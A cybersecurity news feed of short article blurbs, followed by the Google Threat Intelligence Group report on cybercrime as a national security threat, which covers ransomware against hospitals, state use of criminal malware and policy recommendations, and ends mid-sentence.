Cybersecurity is an essential issue for organizations, especially for small and medium-sized enterprises (SMBs). Although they represent 99% of businesses worldwide, only 14% of them are prepared to face a cyberattack, according to Accenture. In its annual cyber readiness report, Hiscox revealed the median number of attacks has risen from 3 in 2022 to 4 in 2023 for SMBs. Additionally, 41% of small businesses fell victim to a cyber attack in 2023, a rise from 38% in the 2022 report and close to double from 22% in 2021 and US small businesses paid over $16,000 in cyber ransoms over the past 12 months.

https://blog.pradeo.com/mobile-security-for-smbs-a-protection-solution-tailored-for-small-teams
The call for invariant-driven development
2025-02-12T14:30:36Z | 1739370636

Writing smart contracts requires a higher level of security assurance than most other fields of software engineering. The industry has evolved from simple ERC20 tokens to complex, multi-component DeFi systems that leverage domain-specific algorithms and handle significant monetary value. This evolution has unlocked immense potential but has also introduced an escalating number […]

https://blog.trailofbits.com/2025/02/12/the-call-for-invariant-driven-development/
Every Enterprise Should Want Their SASE Platform to Be PCI 4.0 Certified – Here’s Why
2025-02-12T13:26:00Z | 1739366760

Cato announced today that it’s become the first SASE platform vendor to achieve PCI DSS v4.0 compliance. More specifically, compliance with PCI DSS v4.0.1. While particularly significant for retailers handling payment data, PCI DSS v4.0 compliance will also benefit non-retailers strengthening their security posture, reducing risk exposure, and demonstrating compliance with industry best practice.  What... The post Every Enterprise Should Want Their SASE Platform to Be PCI 4.0 Certified – Here’s Why  appeared first on Cato Networks.

https://www.catonetworks.com/blog/every-enterprise-should-want-their-sase-to-be-pci-4-certified/
How Mobile App Location Tracking Puts Executives and Enterprises at Risk
2025-02-12T12:30:00Z | 1739363400

The Real-Time Location Tracking Threat Mobile apps quietly collect vast volumes of location data unbeknownst to users. While location tracking enhances functionality of many mobile apps, this data can be exploited and exposes individuals and enterprises to serious risk. From stalking to real-time tracking and surveillance, data misuse can lead to physical harm and even […] The post How Mobile App Location Tracking Puts Executives and Enterprises at Risk appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/02/12/how-mobile-app-location-tracking-puts-executives-and-enterprises-at-risk/
What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)
2025-02-12T10:00:00Z | 1739354400

Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.

https://www.welivesecurity.com/en/videos/what-is-penetration-testing-unlocked-403-cybersecurity-podcast-ep-10/
Jaanuar küberruumis: õngitsus- ja petulehtede arv purustas rekordeid
2025-02-12T06:52:28Z | 1739343148

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et jaanuaris registreeriti Eestis 1121 mõjuga küberintsidenti. Neist valdava osa moodustasid õngitsus- ja petulehed, mida avastati ja blokeeriti rekordiliselt palju.

https://ria.ee/uudised/jaanuar-kuberruumis-ongitsus-ja-petulehtede-arv-purustas-rekordeid
High Threat Security Alert (A25-02-09): Multiple Vulnerabilities in Microsoft Products (February 2025)
2025-02-12T04:00:00Z | 1739332800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-02-10): Vulnerability in Fortinet FortiOS
2025-02-12T04:00:00Z | 1739332800

Fortinet released a security advisory to address a vulnerability in Fortinet FortiOS.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-02-11): Multiple Vulnerabilities in Ivanti Products
2025-02-12T04:00:00Z | 1739332800

Ivanti has released a security advisory to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert: Microsoft Releases February 2025 Security Updates
2025-02-12T02:10:00Z | 1739326200

Security Alert: Microsoft Releases February 2025 Security Updates

https://www.jpcert.or.jp/english/at/2025/at250004.html
The Risk of a Taiwan Invasion Is Rising Fast
2025-02-12T00:00:00Z | 1739318400

Prepare your business for potential geopolitical disruptions from a Taiwan invasion. Assess evolving risks, global economic impacts, and strategic measures to safeguard supply chains and critical operations in Asia.

https://www.recordedfuture.com/research/risk-taiwan-invasion-rising
Cybercrime: A Multifaceted National Security Threat
2025-02-11T20:00:00Z | 1739304000

Executive Summary Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions.  A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare's share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks mean that they must be taken seriously as a national security threat, no matter the motivation of the actors behind it. Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to their war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims’ crypto wallets.  Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts. aside_block ), ('btn_text', 'Download now'), ('href', 'https://services.google.com/fh/files/misc/cybercrime-multifaceted-national-security-threat.pdf'), ('image', )])]> Stand-Alone Cybercrime is a Threat to Countries' National Security Financially motivated cyber intrusions, even those without any ties to state goals, harm national security. A single incident can be impactful enough on its own to have a severe consequence on the victim and disrupt citizens' access to critical goods and services. The enormous volume of financially motivated intrusions occurring every day also has a cumulative impact, hurting national economic competitiveness and placing huge strain on cyber defenders, leading to decreased readiness and burnout. A Single Financially-Motivated Operation Can Have Severe Effects Cybercrime, particularly ransomware attacks, are a serious threat to critical infrastructure. Disruptions to energy infrastructure, such as the 2021 Colonial Pipeline attack, a 2022 incident at the Amsterdam-Rotterdam-Antwerp refining hub, and the 2023 attack on Petro-Canada, have disrupted citizens' ability to access vital goods. While the impacts in these cases were temporary and recoverable, a ransomware attack during a weather emergency or other acute situation could have devastating consequences. Beyond energy, the ransomware attacks on the healthcare sector have had the most severe consequences on everyday people. At the height of the pandemic in early 2020, it appeared that ransomware groups might steer clear of hospitals, with multiple groups making statements to that effect, but the forbearance did not hold. Healthcare organizations' critical missions and the high impact of disruptions have led them to be perceived as more likely to pay a ransom and led some groups to increase their focus on targeting healthcare. The healthcare industry, especially hospitals, almost certainly continues to be a lucrative target for ransomware operators given the sensitivity of patient data and the criticality of the services that it provides. Since 2022, Google Threat Intelligence Group (GTIG) has observed a notable increase in the number of data leak site (DLS) victims from within the hospital subsector. Data leak sites, which are used to release victim data following data theft extortion incidents, are intended to pressure victims to pay a ransom demand or give threat actors additional leverage during ransom negotiations.  In July 2024, the Qilin (aka "AGENDA") DLS announced upcoming attacks targeting US healthcare organizations. They followed through with this threat by adding a regional medical center to their list of claimed victims on the DLS the following week, and adding multiple healthcare and dental clinics in August 2024. The ransomware operators have purportedly stated that they focus their targeting on sectors that pay well, and one of those sectors is healthcare. In March 2024, the RAMP forum actor "badbone," who has been associated with INC ransomware, sought illicit access to Dutch and French medical, government, and educational organizations, stating that they were willing to pay 2–5% more for hospitals, particularly ones with emergency services. Studies from academics and internal hospital reviews have shown that the disruptions from ransomware attacks go beyond inconvenience and have led to life-threatening consequences for patients. Disruptions can impact not just individual hospitals but also the broader healthcare supply chain. Cyberattacks on companies that manufacture critical medications and life-saving therapies can have far-reaching consequences worldwide.  A recent study from researchers at the University of Minnesota - Twin Cities School of Public Health showed that among patients already admitted to a hospital when a ransomware attack takes place, "in-hospital mortality increases by 35 - 41%." Public reporting stated that UK National Health Service data showed a June 2024 ransomware incident at a contractor led to multiple cases of "long-term or permanent impact on physical, mental or social function or shortening of life-expectancy," with more numerous cases of less severe effects. Ransomware operators are aware that their attacks on hospitals will have severe consequences and will likely increase government attention on them. Although some have devised strategies to mitigate the blowback from these operations, the potential monetary rewards associated with targeting hospitals continue to drive attacks on the healthcare sector. The actor "FireWalker," who has recruited partners for REDBIKE (aka Akira) ransomware operations, indicated a willingness to accept access to government and medical targets, but in those cases a different ransomware called "FOULFOG" would be used. Leaked private communications broadly referred to as the "ContiLeaks" reveal that the actors expected their plan to target the US healthcare system in the fall of 2020 to cause alarm, with one actor stating "there will be panic." Economic Disruption On May 8, 2022, Costa Rican President Rodrigo Chaves declared a national emergency caused by CONTI ransomware attacks against several Costa Rican government agencies the month prior. These intrusions caused widespread disruptions in government medical, tax, pension, and customs systems. With imports and exports halted, ports were overwhelmed, and the country reportedly experienced millions of dollars of losses. The remediation costs extended beyond Costa Rica; Spain supported the immediate response efforts, and in 2023, the US announced $25 million USD in cybersecurity aid to Costa Rica.  While the Costa Rica incident was exceptional, responding to a cybercrime incident can involve significant expenses for the affected entity, such as paying multi-million dollar ransom demands, loss of income due to system downtime, providing credit monitoring services to impacted clients, and paying remediation costs and fines. In just one example, a US healthcare organization reported $872 million USD in "unfavorable cyberattack effects" after a disruptive incident. In the most extreme cases, these costs can contribute to organizations ceasing operations or declaring bankruptcy.  In addition to the direct impacts to individual organizations, financial impacts often extend to taxpayers and can have significant impacts on the national economy due to follow-on effects of the disruptions. The US Federal Bureau of Investigation's Internet Crime Complaint Center (IC3) has indicated that between October 2013 and December 2023, business email compromise (BEC) operations alone led to $55 billion USD in losses. The cumulative effect of these cybercrime incidents can have an impact on a country's economic competitiveness. This can be particularly severe for smaller or developing countries, especially those with a less diverse economy. Data Leak Sites Add Additional Threats In addition to deploying ransomware to interfere with business operations, criminal groups have added the threat of leaking data stolen from victims to bolster their extortion operations. This now standard tactic has increased the volume of sensitive data being posted by criminals and created an opportunity for it to be obtained and exploited by state intelligence agencies.  Threat actors post proprietary company data—including research and product designs—on data leak sites where they are accessible to the victims' competitors. GTIG has previously observed threat actors sharing tips for targeting valuable data for extortion operations. In our research, GTIG identified Conti "case instructions" indicating that actors should prioritize certain types of data to use as leverage in negotiations, including files containing confidential information, document scans, HR documents, company projects, and information protected by the General Data Protection Regulation (GDPR). The number of data leak sites has proliferated, with the number of sites tracked by GTIG almost doubling since 2022. Leaks of confidential business and personal information by extortion groups can cause embarrassment and legal consequences for the affected organization, but they also pose national security threats. If a company's confidential intellectual property is leaked, it can undermine the firm's competitive position in the market and undermine the host country's economic competitiveness. The wide-scale leaking of personally identifiable information (PII) also creates an opportunity for foreign governments to collect this information to facilitate surveillance and tracking of a country's citizens. Cybercrime Directly Supporting State Activity Since the earliest computer network intrusions, financially motivated actors have conducted operations for the benefit of hostile governments. While this pattern has been consistent, the heightened level of cyber activity following Russia's war in Ukraine has shown that, in times of heightened need, the latent talent pool of cybercriminals can be paid or coerced to support state goals. Operations carried out in support of the state, but by criminal actors, have numerous benefits for their sponsors, including a lower cost and increased deniability. As the volume of financially motivated activity increases, the potential danger it presents does as well. States as a Customer in Cybercrime Ecosystems Modern cybercriminals are likely to specialize in a particular area of cybercrime and partner with other entities with diverse specializations to conduct operations. The specialization of cybercrime capabilities presents an opportunity for state-backed groups to simply show up as another customer for a group that normally sells to other criminals. Purchasing malware, credentials, or other key resources from illicit forums can be cheaper for state-backed groups than developing them in-house, while also providing some ability to blend in to financially motivated operations and attract less notice. Russian State Increasingly Leveraging Malware, Tooling Sourced from Crime Marketplaces Google assesses that resource constraints and operational demands have contributed to Russian cyber espionage groups' increasing use of free or publicly available malware and tooling, including those commonly employed by criminal actors to conduct their operations. Following Russia's full-scale invasion of Ukraine, GTIG has observed groups suspected to be affiliated with Russian military intelligence services adopt this type of "low-equity" approach to managing their arsenal of malware, utilities, and infrastructure. The tools procured from financially motivated actors are more widespread and lower cost than those developed by the government. This means that if an operation using this malware is discovered, the cost of developing a new tool will not be borne by the intelligence agency; additionally, the use of such tools may assist in complicating attribution efforts. Notably, multiple threat clusters with links to Russian military intelligence have leveraged disruptive malware adapted from existing ransomware variants to target Ukrainian entities.  APT44 (Sandworm, FROZENBARENTS) APT44, a threat group sponsored by Russian military intelligence, almost certainly relies on a diverse set of Russian companies and criminal marketplaces to source and sustain its more frequently operated offensive capabilities. The group has used criminally sourced tools and infrastructure as a source of disposable capabilities that can be operationalized on short notice without immediate links to its past operations. Since Russia's full-scale invasion of Ukraine, APT44 has increased its use of such tooling, including malware such as DARKCRYSTALRAT (DCRAT), WARZONE, and RADTHIEF ("Rhadamanthys Stealer"), and bulletproof hosting infrastructure such as that provided by the Russian-speaking actor "yalishanda," who advertises in cybercriminal underground communities. APT44 campaigns in 2022 and 2023 deployed RADTHIEF against victims in Ukraine and Poland. In one campaign, spear-phishing emails targeted a Ukrainian drone manufacturer and leveraged SMOKELOADER, a publicly available downloader popularized in a Russian-language underground forum that is still frequently used in criminal operations, to load RADTHIEF.  APT44 also has a history of deploying disruptive malware built upon known ransomware variants. In October 2022, a cluster we assessed with moderate confidence to be APT44 deployed PRESSTEA (aka Prestige) ransomware against logistics entities in Poland and Ukraine, a rare instance in which APT44 deployed disruptive capabilities against a NATO country. In June 2017, the group conducted an attack leveraging ETERNALPETYA (aka NotPetya), a wiper disguised as ransomware, timed to coincide with Ukraine's Constitution Day marking its independence from Russia. Nearly two years earlier, in late 2015, the group used a modified BLACKENERGY variant to disrupt the Ukrainian power grid. BLACKENERGY originally emerged as a distributed denial-of-service (DDoS) tool, with later versions sold in criminal marketplaces. UNC2589 (FROZENVISTA) UNC2589, a threat cluster whose activity has been publicly attributed to the Russian General Staff Main Intelligence Directorate (GRU)'s 161st Specialist Training Center (Unit 29155), has conducted full-spectrum cyber operations, including destructive attacks, against Ukraine. The actor is known to rely on non-military elements including cybercriminals and private-sector organizations to enable their operations, and GTIG has observed the use of a variety of malware-as-a-service tools that are prominently sold in Russian-speaking cybercrime communities. In January 2022, a month prior to the invasion, UNC2589 deployed PAYWIPE (also known as WHISPERGATE) and SHADYLOOK wipers against Ukrainian government entities in what may have been a preliminary strike, using the GOOSECHASE downloader and FINETIDE dropper to drop and execute SHADYLOOK on the target machine. US Department of Justice indictments identified a Russian civilian, who GTIG assesses was a likely criminal contractor, as managing the digital environments used to stage the payloads used in the attacks. Additionally, CERT-UA corroborated GTIG's findings of strong similarities between SHADYLOOK and WhiteBlackCrypt ransomware (also tracked as WARYLOOK). GOOSECHASE and FINETIDE are also publicly available for purchase on underground forums. Turla (SUMMIT) In September 2022, GTIG identified an operation leveraging a legacy ANDROMEDA infection to gain initial access to selective targets conducted by Turla, a cyber espionage group we assess to be sponsored by Russia's Federal Security Service (FSB). Turla re-registered expired command-and-control (C&C or C2) domains previously used by ANDROMEDA, a common commodity malware that was widespread in the early 2010s, to profile victims; it then selectively deployed KOPILUWAK and QUIETCANARY to targets in Ukraine. The ANDROMEDA backdoor whose C2 was hijacked by Turla was first uploaded to VirusTotal in 2013 and spreads from infected USB keys.  While GTIG has continued to observe ANDROMEDA infections across a wide variety of victims, GTIG has only observed suspected Turla payloads delivered in Ukraine. However, Turla's tactic of piggybacking on widely distributed, financially motivated malware to enable follow-on compromises is one that can be used against a wide range of organizations. Additionally, the use of older malware and infrastructure may cause such a threat to be overlooked by defenders triaging a wide variety of alerts. In December 2024, Microsoft reported on the use of Amadey bot malware related to cyber criminal activity to target Ukrainian military entities by Secret Blizzard, an actor that aligns approximately with what we track as Turla. While we are unable to confirm this activity, Microsoft's findings suggest that Turla has continued to leverage the tactic of using cybercrime malware. APT29 (ICECAP) In late 2021, GTIG reported on a campaign conducted by APT29, a threat group assessed to be sponsored by the Russian Foreign Intelligence Service (SVR), in which operators used credentials likely procured from an infostealer malware campaign conducted by a third-party actor to gain initial access to European entities. Infostealers are a broad classification of malware that have the capability or primary goal of collecting and stealing a range of sensitive user information such as credentials, browser data and cookies, email data, and cryptocurrency wallets.An analysis of workstations belonging to the target revealed that some systems had been infected with the CRYPTBOT infostealer shortly before a stolen session token used to gain access to the targets' Microsoft 365 environment was generated. An example of the sale of government credentials on an underground forum Use of Cybercrime Tools by Iran and China  While Russia is the country that has most frequently been identified drawing on resources from criminal forums, they are not the only ones. For instance, in May 2024, GTIG identified a suspected Iranian group, UNC5203, using the aforementioned RADTHIEF backdoor in an operation using themes associated with the Israeli nuclear research industry. In multiple investigations, the Chinese espionage operator UNC2286 was observed ostensibly carrying out extortion operations, including using STEAMTRAIN ransomware, possibly to mask its activities. The ransomware dropped a JPG file named "Read Me.jpg" that largely copies the ransomware note delivered with DARKSIDE. However, no links have been established with the DARKSIDE ransomware-as-a-service (RaaS), suggesting the similarities are largely superficial and intended to lend credibility to the extortion attempt. Deliberately mixing ransomware activities with espionage intrusions supports the Chinese Government's public efforts to confound attribution by conflating cyber espionage activity and ransomware operations. Criminals Supporting State Goals In addition to purchasing tools for state-backed intrusion groups to use, countries can directly hire or co-opt financially motivated attackers to conduct espionage and attack missions on behalf of the state. Russia, in particular, has leveraged cybercriminals for state operations. Current and Former Russian Cybercriminal Actors Engage in Targeted Activity Supporting State Objectives Russian intelligence services have increasingly leveraged pre-existing or new relationships with cybercriminal groups to advance national objectives and augment intelligence collection. They have done so in particular since the beginning of Russia's full-scale invasion of Ukraine. GTIG judges that this is a combination of new efforts by the Russian state and the continuation of ongoing efforts for other financially motivated, Russia-based threat actors that had relationships with the Russian intelligence services that predated the invasion. In at least some cases, current and former members of Russian cybercriminal groups have carried out intrusion activity likely in support of state objectives.  CIGAR (UNC4895, RomCom) CIGAR (also tracked as UNC4895 and publicly reported as RomCom) is a dual financial and espionage-motivated threat group. Active since at least 2019, the group historically conducted financially motivated operations before expanding into espionage activity that GTIG judges fulfills espionage requirements in support of Russian national interests following the start of Russia's full-scale invasion of Ukraine. CIGAR's ongoing engagement in both types of activity differentiates the group from threat actors like APT44 or UNC2589, which leverage cybercrime actors and tooling toward state objectives. While the precise nature of the relationship between CIGAR and the Russian state is unclear, the group's high operational tempo, constant evolution of its malware arsenal and delivery methods, and its access to and exploitation of multiple zero-day vulnerabilities suggest a level of sophistication and resourcefulness unusual for a typical cybercrime actor.  Targeted intrusion activity from CIGAR dates back to late 2022, targeting Ukrainian military and government entities. In October 2022, CERT-UA reported on a phishing campaign that distributed emails allegedly on behalf of the Press Service of the General Staff of the Armed Forces of Ukraine, which led to the deployment of the group's signature RomCom malware. Two months later, in December 2022, CERT-UA highlighted a RomCom operation targeting users of DELTA, a situational awareness and battlefield management system used by the Ukrainian military. CIGAR activity in 2023 and 2024 included the leveraging of zero-day vulnerabilities to conduct intrusion activity. In late June 2023, a phishing operation targeting European government and military entities used lures related to the Ukrainian World Congress, a nonprofit involved in advocacy for Ukrainian interests, and a then-upcoming NATO summit, to deploy the MAGICSPELL downloader, which exploited CVE-2023-36884 as a zero-day in Microsoft Word. In 2024, the group was reported to exploit the Firefox vulnerability CVE-2024-9680, chained together with the Windows vulnerability CVE-2024-49039, to deploy RomCom.  CONTI At the outset of Russia's full-scale invasion of Ukraine, the CONTI ransomware group publicly announced its support for the Russian government, and subsequent leaks of server logs allegedly containing chat messages from members of the group revealed that at least some individuals were interested in conducting targeted attacks,and may have been taking targeting directions from a third party. GTIG further assessed that former CONTI members comprise part of an initial access broker group conducting targeted attacks against Ukraine tracked by CERT-UA as UAC-0098.  UAC-0098 historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks, and GTIG assesses that the group previously acted as an initial access broker for various ransomware groups including CONTI and Quantum. In early 2022, however, the actor shifted its focus to Ukrainian entities in the government and hospitality sectors as well as European humanitarian and nonprofit organizations.  Chinese-Language Operator Supports Espionage Goals  UNC5174 ("Uteus") UNC5174 uses the "Uteus" hacktivist persona who has claimed to be affiliated with China's Ministry of State Security, working as an access broker and possible contractor who conducts for-profit intrusions. UNC5174 has weaponized multiple vulnerabilities soon after they were publicly announced, attempting to compromise numerous devices before they could be patched. For example, in February 2024, UNC5174 was observed exploiting CVE-2024-1709 in ConnectWise ScreenConnect to compromise hundreds of institutions primarily in the US and Canada, and in April 2024, GTIG confirmed UNC5174 had weaponized CVE-2024-3400 in an attempt to exploit Palo Alto Network's (PAN's) GlobalProtect appliances. In both cases, multiple China-nexus clusters were identified leveraging the exploits, underscoring how UNC5174 may enable additional operators. Hybrid Groups Enable Cheap Capabilities Another form of financially motivated activity supporting state goals are groups whose main mission may be state-sponsored espionage are, either tacitly or explicitly, allowed to conduct financially motivated operations to supplement their income. This can allow a government to offset direct costs that would be required to maintain groups with robust capabilities.  Moonlighting Among Chinese Contractors  APT41 APT41 is a prolific cyber operator working out of the People's Republic of China and most likely a contractor for the Ministry of State Security. In addition to state-sponsored espionage campaigns against a wide array of industries, APT41 has a long history of conducting financially motivated operations. The group's cybercrime activity has mostly focused on the video game sector, including ransomware deployment. APT 41 has also enabled other Chinese espionage groups, with digital certificates stolen by APT41 later employed by other Chinese groups. APT41's cybercrime has continued since GTIG's 2019 report, with the United States Secret Service attributing an operation that stole millions in COVID relief funds to APT41, and GTIG identifying an operation targeting state and local governments. Iranian Groups Deploy Ransomware for Disruption and Profit Over the past several years, GTIG has observed Iranian espionage groups conducting ransomware operations and disruptive hack-and-leak operations. Although much of this activity is likely primarily driven by disruptive intent, some actors working on behalf of the Iranian government may also be seeking ways to monetize stolen data for personal gain, and Iran's declining economic climate may serve as an impetus for this activity. UNC757  In August 2024, the US Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Defense Cybercrime Center (DC3) released a joint advisory indicating that a group of Iran-based cyber actors known as UNC757 collaborated with ransomware affiliates including NoEscape, Ransomhouse, and ALPHV to gain network access to organizations across various sectors and then help the affiliates deploy ransomware for a percentage of the profits. The advisory further indicated that the group stole data from targeted networks likely in support of the Iranian government, and their ransomware operations were likely not sanctioned by the Government of Iran.  GTIG is unable to independently corroborate UNC757's reported collaboration with ransomware affiliates. However, the group has historical, suspected ties to the persona "nanash" that posted an advertisement in mid-2020 on a cybercrime forum claiming to have access to various networks, as well as hack-and-leak operations associated with the PAY2KEY ransomware and corresponding persona that targeted Israeli firms.  Examples of Dual Motive (Financial Gain and Espionage) In multiple incidents, individuals who have conducted cyber intrusions on behalf of the Iranian government have also been identified conducting financially motivated intrusion.  A 2020 US Department of Justice indictment indicated that two Iranian nationals conducted cyber intrusion operations targeting data "pertaining to national security, foreign policy intelligence, non-military nuclear information, aerospace data, human rights activist information, victim financial information and personally identifiable information, and intellectual property, including unpublished scientific research." The intrusions in some cases were conducted at the behest of the Iranian government, while in other instances, the defendants sold hacked data for financial gain.  In 2017, the US DoJ indicted an Iranian national who attempted to extort HBO by threatening to release stolen content. The individual had previously worked on behalf of the Iranian military to conduct cyber operations targeting military and nuclear software systems and Israeli infrastructure.  DPRK Cyber Threat Actors Conduct Financially Motivated Operations to Generate Revenue for Regime, Fund Espionage Campaigns Financially motivated operations are broadly prevalent among threat actors linked to the Democratic People's Republic of Korea (DPRK). These include groups focused on generating revenue for the regime as well as those that use the illicit funds to support their intelligence-gathering efforts. Cybercrime focuses on the cryptocurrency sector and blockchain-related platforms, leveraging tactics including but not limited to the creation and deployment of malicious applications posing as cryptocurrency trading platforms and the airdropping of malicious non-fungible tokens (NFTs) that redirect the user to wallet-stealing phishing websites. A March 2024 United Nations (UN) report estimated North Korean cryptocurrency theft between 2017 and 2023 at approximately $3 billion.  APT38 APT38, a financially motivated group aligned with the Reconnaissance General Bureau (RGB), was responsible for the attempted theft of vast sums of money from institutions worldwide, including via compromises targeting SWIFT systems. Public reporting has associated the group with the use of money mules and casinos to withdraw and launder funds from fraudulent ATM and SWIFT transactions. In publicly reported heists alone, APT38's attempted thefts from financial institutions totaled over $1.1 billion USD, and by conservative estimates, successful operations have amounted to over $100 million USD. The group has also deployed destructive malware against target networks to render them inoperable following theft operations. While APT38 now appears to be defunct, we have observed evidence of its operators regrouping into other clusters, including those heavily targeting cryptocurrency and blockchain-related entities and other financials.  UNC1069 (CryptoCore), UNC4899 (TraderTraitor) Limited indicators suggest that threat clusters GTIG tracks as UNC1069 (publicly referred to as CryptoCore) and UNC4899 (also reported as TraderTraitor) are successors to the now-defunct APT38. These clusters focus on financial gain, primarily by targeting cryptocurrency and blockchain entities. In December 2024, a joint statement released by the US FBI, DC3, and National Police Agency of Japan (NPA) reported on TraderTraitor's theft of cryptocurrency then valued at $308 million USD from a Japan-based company. APT43 (Kimsuky) APT43, a prolific cyber actor whose collection requirements align with the mission of the RGB, funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence, in contrast to groups focused primarily on revenue generation like APT38. While the group's espionage targeting is broad, it has demonstrated a particular interest in foreign policy and nuclear security, leveraging moderately sophisticated technical capabilities coupled with aggressive social engineering tactics against government organizations, academia, and think tanks. Meanwhile, APT43's financially motivated operations focus on stealing and laundering cryptocurrency to buy operational infrastructure.  UNC3782 UNC3782, a suspected North Korean threat actor active since at least 2022, conducts both financial crime operations against the cryptocurrency sector and espionage activity, including the targeting of South Korean organizations attempting to combat cryptocurrency-related crimes, such as law firms and related government and media entities. UNC3782 has targeted users on cryptocurrency platforms including Ethereum, Bitcoin, Arbitrum, Binance Smart Chain, Cronos, Polygon, TRON, and Solana; Solana in particular constitutes a target-rich environment for criminal actors due to the platform's rapid growth.  APT45 (Andariel) APT45, a North Korean cyber operator active since at least 2009, has conducted espionage operations focusing on government, defense, nuclear, and healthcare and pharmaceutical entities. The group has also expanded its remit to financially motivated operations, and we suspect that it engaged in the development of ransomware, distinguishing it from other DPRK-nexus actors.  DPRK IT Workers  DPRK IT workers pose as non-North Korean nationals seeking employment at a wide range of organizations globally to generate revenue for the North Korean regime, enabling it to evade sanctions and fund its weapons of mass destruction (WMD) and ballistic missiles programs. IT workers have also increasingly leveraged their privileged access at employer organizations to engage in or enable malicious intrusion activity and, in some cases, extort those organizations with threats of data leaks or sales of proprietary company information following the termination of their employment., While DPRK IT worker operations are widely reported to target US companies, they have increasingly expanded to Europe and other parts of the world. Tactics to evade detection include the use of front companies and services of "facilitators," non-North Korean individuals who provide services such as money and/or cryptocurrency laundering, assistance during the hiring process, and receiving and hosting company laptops to enable the workers remote access in exchange for a percentage of the workers' incomes. A Comprehensive Approach is Required We believe tackling this challenge will require a new and stronger approach recognizing the cybercriminal threat as a national security priority requiring international cooperation. While some welcome enhancements have been made in recent years, more must—and can—be done. The structure of the cybercrime ecosystem makes it particularly resilient to takedowns. Financially motivated actors tend to specialize in a single facet of cybercrime and regularly work with others to accomplish bigger schemes. While some actors may repeatedly team up with particular partners, actors regularly have multiple suppliers (or customers) for a given service.  If a single ransomware-as-a-service provider is taken down, many others are already in place to fill in the gap that has been created. This resilient ecosystem means that while individual takedowns can disrupt particular operations and create temporary inconveniences for cybercriminals, these methods need to be paired with wide-ranging efforts to improve defense and crack down on these criminals' ability to carry out their operations. We urge policymakers to consider taking a number of steps: Demonstrably elevate cybercrime as a national security priority: Governments must recognize cybercrime as a pernicious national security threat and allocate resources accordingly. This includes prioritizing intelligence collection and analysis on cybercriminal organizations, enhancing law enforcement capacity to investigate and prosecute cybercrime, and fostering international cooperation to dismantle these transnational networks. Strengthen cybersecurity defenses: Policymakers should promote the adoption of robust cybersecurity measures across all sectors, particularly critical infrastructure. This includes incentivizing the implementation of security best practices, investing in research and development of advanced security technologies, enabling digital modernization and uptake of new technologies that can advantage defenders, and supporting initiatives that enhance the resilience of digital systems against attacks and related deceptive practices. Disrupt the cybercrime ecosystem: Targeted efforts are needed to disrupt the cybercrime ecosystem by targeting key enablers such as malware developers, bulletproof hosting providers, and financial intermediaries such as cryptocurrency exchanges. This requires a combination of legal, technical, and financial measures to dismantle the infrastructure that supports cybercriminal operations and coordinated international efforts to enable the same. Enhance international cooperation: cybercrime transcends national borders, necessitating strong international collaboration to effectively combat this threat. Policymakers should prioritize and resource international frameworks for cyber threat information sharing, joint investigations, and coordinated takedowns of cybercriminal networks, including by actively contributing to the strengthening of international organizations and initiatives dedicated to combating cybercrime, such as the Global Anti-Scams Alliance (GASA). They should also prioritize collective efforts to publicly decry malicious cyber activity through joint public attribution and coordinated sanctions, where appropriate.  Empower individuals and businesses: Raising awareness about cyber threats and promoting cybersecurity education is crucial to building a resilient society. Policymakers should support initiatives that educate individuals and businesses about online safety, encourage the adoption of secure practices, empower service providers to take action against cybercriminals including through enabling legislation, and provide resources for reporting and recovering from cyberattacks. Elevate strong private sector security practices: Ransomware and other forms of cybercrime predominantly exploit insecure, often legacy technology architectures. Policymakers should consider steps to prioritize technology transformation, including the adoption of technologies/products with a strong security track record; diversifying vendors to mitigate risk resulting from overreliance on a single technology; and requiring interoperability across the technology stack. aside_block ), ('btn_text', 'Watch now'), ('href', 'https://www.youtube.com/watch?v=NtANWZPHUak'), ('image', )])]> About the Authors Google Threat Intelligence Group brings together the Mandiant Intelligence and Threat Analysis Group (TAG) teams, and focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cybercrime networks. We apply our intelligence to improve Google's defenses and 